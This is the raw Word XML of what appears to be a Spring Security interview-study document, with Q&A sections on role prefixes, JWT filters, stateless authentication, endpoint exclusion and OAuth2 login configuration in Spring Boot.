          <w:p w14:paraId="16CB9D65"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1C0E1E" w:rsidRPr="00CE4B95" w14:paraId="20234FAD" w14:textId="77777777" w:rsidTr="001C0E1E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71456B98"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Role("USER")</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F3D8F1F"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adds ROLE_ prefix</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47A85720"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should be ROLE_USER in DB</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001C0E1E" w:rsidRPr="00CE4B95" w14:paraId="3FF698D5" w14:textId="77777777" w:rsidTr="001C0E1E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05B46CA7"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uthority("ROLE_USER")</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75B8FD1C"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54D30F16"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0F7668D3" w14:textId="1A386DBF" w:rsidR="00D40DC5"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54" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D27ADF" w14:textId="0859E3BC" w:rsidR="001E1C2A" w:rsidRPr="00CE4B95" w:rsidRDefault="00C03652" w:rsidP="001E1C2A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="483" w:name="_Toc197867697"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How do you secure REST APIs using Spring Security</w:t>
      </w:r>
      <w:r w:rsidR="001E1C2A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="483"/>
    </w:p>
    <w:p w14:paraId="2A96E796" w14:textId="538CF449" w:rsidR="00C03652" w:rsidRPr="00CE4B95"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JWT or Basic Auth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB87659"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CSRF for stateless APIs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE52FD4" w14:textId="1D1C320A"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config:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3B98BC"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http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A523B82" w14:textId="77777777" w:rsidR="001672C3"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color w:val="666600"/>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p>
    <w:p w14:paraId="5B5F6DB7" w14:textId="64AB920D" w:rsidR="00C03652" w:rsidRPr="00CE4B95"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00C03652" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00C03652" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>disable</w:t>
      </w:r>
      <w:r w:rsidR="00C03652" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7700E469"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784795AA"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D458EF8"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208AB5CF"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78F29BB8" w14:textId="6498FD9D"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JWT filter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CF87CB" w14:textId="591D0624" w:rsidR="00C03652" w:rsidRPr="00CE4B95"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55" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="224FD9EA" w14:textId="57FF3897" w:rsidR="001E1C2A" w:rsidRPr="00CE4B95" w:rsidRDefault="001F3B1B" w:rsidP="001E1C2A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="484" w:name="_Toc197867698"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to implement JWT in Spring Security</w:t>
      </w:r>
      <w:r w:rsidR="001E1C2A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="484"/>
    </w:p>
    <w:p w14:paraId="6C67A8D7" w14:textId="151259E6"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cept requests with a custom OncePerRequestFilter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A20C2C2"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 the token and set the authentication in SecurityContextHolder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA17054" w14:textId="0AA57FB4"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ssion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B42BEA3" w14:textId="2B43C0BD" w:rsidR="001F3B1B"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56" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6366E5" w14:textId="1D1413C2" w:rsidR="001E1C2A" w:rsidRPr="00CE4B95" w:rsidRDefault="0088108E" w:rsidP="001E1C2A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="485" w:name="_Toc197867699"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the difference between stateless and stateful authentication</w:t>
      </w:r>
      <w:r w:rsidR="001E1C2A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="485"/>
    </w:p>
    <w:p w14:paraId="596F3475" w14:textId="46DA539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CE4B95"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3771"/>
      </w:tblGrid>
      <w:tr w:rsidR="0088108E" w:rsidRPr="00CE4B95" w14:paraId="5EA6DA9F" w14:textId="77777777" w:rsidTr="0088108E">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2FE954F4"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56CEC02"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108E" w:rsidRPr="00CE4B95" w14:paraId="3C5ABAF1" w14:textId="77777777" w:rsidTr="0088108E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="421DF40E"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1228A550"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is stored in server memory</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0088108E" w:rsidRPr="00CE4B95" w14:paraId="4CF26808" w14:textId="77777777" w:rsidTr="0088108E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7FC270F6"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61747D29"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 (e.g., JWT) sent with every request</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5DB9972E" w14:textId="739CB0C9" w:rsidR="0088108E"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57" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DEEC861" w14:textId="30FFCC2E" w:rsidR="001E1C2A" w:rsidRPr="00CE4B95" w:rsidRDefault="003202E7" w:rsidP="001E1C2A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="486" w:name="_Toc197867700"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is OncePerRequestFilter</w:t>
      </w:r>
      <w:r w:rsidR="001E1C2A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="486"/>
    </w:p>
    <w:p w14:paraId="33A70F30" w14:textId="341E69A4" w:rsidR="003202E7" w:rsidRPr="00CE4B95" w:rsidRDefault="003202E7" w:rsidP="002967C2">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ase class for filters that should be </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>invoked only once per request</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, often used for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12482023"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147A756D"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validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F24716E" w14:textId="3BED2A3F"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security filters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D440609" w14:textId="1B5A953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58" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A87CE8" w14:textId="07F66C1D" w:rsidR="001E1C2A" w:rsidRPr="00CE4B95" w:rsidRDefault="00AD73F9" w:rsidP="001E1C2A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="487" w:name="_Toc197867701"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to exclude certain endpoints (like /login, /register) from Spring Security</w:t>
      </w:r>
      <w:r w:rsidR="001E1C2A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="487"/>
    </w:p>
    <w:p w14:paraId="0BCCB104" w14:textId="2337DC1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CE4B95"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g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gis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mitAll</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46AFAD09" w14:textId="46E2FF52"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59" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8E1027" w14:textId="2777166A" w:rsidR="001E1C2A" w:rsidRPr="00CE4B95" w:rsidRDefault="003D3A9B" w:rsidP="001E1C2A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="488" w:name="_Toc197867702"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is OAuth2 and how is it supported in Spring Security</w:t>
      </w:r>
      <w:r w:rsidR="001E1C2A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="488"/>
    </w:p>
    <w:p w14:paraId="7CCFD9AA" w14:textId="7CD153D3" w:rsidR="003D3A9B" w:rsidRPr="00CE4B95"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OAuth2 is an </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>authorization framework</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for token-based access delegation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDE5361" w14:textId="77777777" w:rsidR="003D3A9B" w:rsidRPr="00CE4B95" w:rsidRDefault="003D3A9B" w:rsidP="00877C86">
      <w:pPr>
        <w:ind w:firstLine="36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provides:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B845BD" w14:textId="77777777"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client for login with Google, GitHub, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7276514F" w14:textId="0112FE73"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resource-server for JWT token validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8AF67B" w14:textId="04A760A3" w:rsidR="009F301D" w:rsidRPr="00CE4B95"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60" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3EA4F2" w14:textId="135C8E5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89" w:name="_Toc197867703"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain OAuth in detail in Spring Boot?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="489"/>
    </w:p>
    <w:p w14:paraId="2176CAAB" w14:textId="27329A10" w:rsidR="00F7342F" w:rsidRPr="00CE4B95" w:rsidRDefault="00F7342F" w:rsidP="006060EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OAuth</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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Key Concepts in OAuth:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5943EF2E"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uthorization Server</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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Server</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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Client</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>: The client is the third-party application that seeks access to the user’s data on the resource server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C212C51"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Owner</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>: Typically, the end user who owns the data or resources that the client wants to access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FADEF5F"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ccess Token</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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fresh Token</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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Flow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F02DF2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Requests Authorization</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>: The user is redirected to the authorization server (e.g., Google, Facebook) by the client application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF7295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Grants Authorization</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>: After authentication, the user approves or denies the permission request by the client app.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F88BA7"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Authorization Code</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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lastRenderedPageBreak/>
        <w:t>Client Exchanges Authorization Code for Access Token</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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Client Accesses Protected Resources</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>: The client can now use the access token to access the user's protected resources on the resource server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08409C8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Token Expiration and Refresh</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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Types of OAuth Flows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75613E1C"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Authorization Code Flow</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>: Used by server-side web applications. The authorization code is exchanged for an access token and refresh token.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E98AE56"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Implicit Flow</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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Password Grant Flow</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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Client Credentials Flow</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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in Spring Boot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644D09D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tep-by-Step OAuth Implementation in Spring Boot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3D29B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dd Dependencies</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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Maven</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039C198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168BA9C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6FC31E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1413F84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oauth2-client&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D28E24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47DD53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6A69C93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7759373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security&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A7487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1092D16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6B78E2D1"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Gradle</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A249D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dependencies {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F67AF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oauth2-client'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D83DB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security'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C50D4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199ADDD8"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pplication Properties Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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xample for Google OAuth2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F5E3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id=&lt;client-id&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742A9C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secret=&lt;client-secret&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C22AB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scope=profile,email</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30ECD86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redirect-uri={baseUrl}/login/oauth2/code/{registrationId}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0936331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authorization-uri=https://accounts.google.com/o/oauth2/auth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F53E7F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spring.security.oauth2.client.provider.google.token-uri=https://oauth2.googleapis.com/token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F7591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user-info-uri=https://www.googleapis.com/oauth2/v3/userinfo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C22413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Security Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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3A0F8D9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WebSecurity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B7A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SecurityConfig extends WebSecurityConfigurerAdapter {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE90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1219287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rotected void configure(HttpSecurity http) throws Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A31C7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http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B1006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orizeRequests()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6A1B5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tMatchers("/", "/login**").permitAll()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A8500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yRequest().authenticated()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7412A11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d()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BBB27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auth2Login()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B9A24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oginPage("/login")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9214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defaultSuccessUrl("/home", true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3380C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1E0A5D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24613FF"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Create Controller</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>: Create a controller to handle OAuth login and display user details after authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357A0C0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troller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262B71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HomeController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB043B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GetMapping("/home")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6422388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String home(Model model, @AuthenticationPrincipal OAuth2User principal) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDFF2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model.addAttribute("name", principal.getAttribute("name"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6905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home";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F3D14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04AFD5C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8A7FB7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Run the Application</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
